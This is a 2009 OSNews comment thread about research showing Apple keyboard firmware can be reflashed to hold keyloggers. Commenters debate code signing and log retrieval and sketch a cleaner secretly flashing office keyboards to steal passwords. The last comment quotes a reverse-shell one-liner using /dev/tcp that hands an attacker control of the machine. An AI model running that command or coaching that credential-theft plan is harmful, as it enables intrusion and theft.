Linked by Thom Holwerda on Sat 1st Aug 2009 18:22 UTC
Apple Almost everything has a processor and/or memory chips these days, including keyboards. Apple's keyboards are no exception; they have 8Kb of flash memory, and 256 bytes of RAM. K. Chen has found a way to very easily install keyloggers and other possibly malicious code right inside these Apple keyboards (more here). Proof of concept code is here as well.
Thread beginning with comment 376577
To view parent comment, click here.
To read all comments associated with this story, please click here.
PlatformAgnostic
Member since:
2006-01-02

You're right that this isn't exactly the end of the world. But it isn't a totally unreasonable thing for a bored hacker to do IN ADDITION to installing a standard software keylogger. If the attack installs a firmware rootkit in the keyboard, it would be tough to know about an eradicate since even a totally clean install would not get rid of it.

On another note, I don't think we have any reason to believe that this problem applies solely to apple. Other manufacturers probably also have firmware on their keyboards and perhaps they don't bother to implement a proper code-signing system on their keyboard microcontrollers (it would be prohibitively expensive probably).

Reply Parent Score: 2

darknexus Member since:
2008-07-15

And a code signing would be absolutely useless, seeing as how that signature would simply be duplicated. The thing about code signing is that it's only useful as long as the signature isn't reversed, as soon as it is the signature might as well not even be there. On a software platform such as a typical PC or even a cel phone, this wouldn't be a big deal as the signature certificates could simply be updated in the background, but on a tiny embedded system it would be worse than useless even if they did bother to implement it. I doubt many would continuously update their keyboard firmware for new signatures, and it would be too risky to have firmware updates applied automatically without prompting in case the device was bricked due to a crash or loss of power.

Reply Parent Score: 2

bert64 Member since:
2007-04-23

If you were to install a hardware keylogger like this, how would you get the logs out of the system?
You'd still need a software component running in order to read the logs from the flash and transmit them away somewhere, and this software component would be just as vulnerable as a regular keylogger to being removed.

This just sounds like a clever idea in theory that provides no real benefit in practice.

Reply Parent Score: 1

WereCatf Member since:
2006-02-15

Nope, it doesn't provide that much of real benefit except in cases where you have physical access to the keyboard but the system is secured too tightly to hack into. The keyboard has room for 1000 keystrokes so it'd log your username and password, and as you most likely log in to other services too right after login those credentials would also be stored.

Now, let's say that you've been hired to just clean the floors, wash the windows and such and you do that on the off-hours when no one else is around. You just pop out your netbook, upload the hacked firmware to all nearby machines, finish your job, and then next day download the recorded keystrokes. Voila! You have all the most used usernames and passwords of that company and can do as you please.

Just because you lack the imagination to utilize this doesn't mean it cannot be utilized by someone with more imagination.

Reply Parent Score: 2

stanbr Member since:
2009-05-22

I was thinking the same.. then I read the full article here: http://www.digitalsociety.org/apple-keyboards-hacked-and-possessed/

So, in fact, its REALLY EASY to send these to a remote server WITHOUT using another malware... ;)

From the article:
"exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0

This would instantly connect the computer to the attacker’s computer and instantly give the attacker full control of the computer at which point additional rootkits could be installed."

Cya.

Reply Parent Score: 1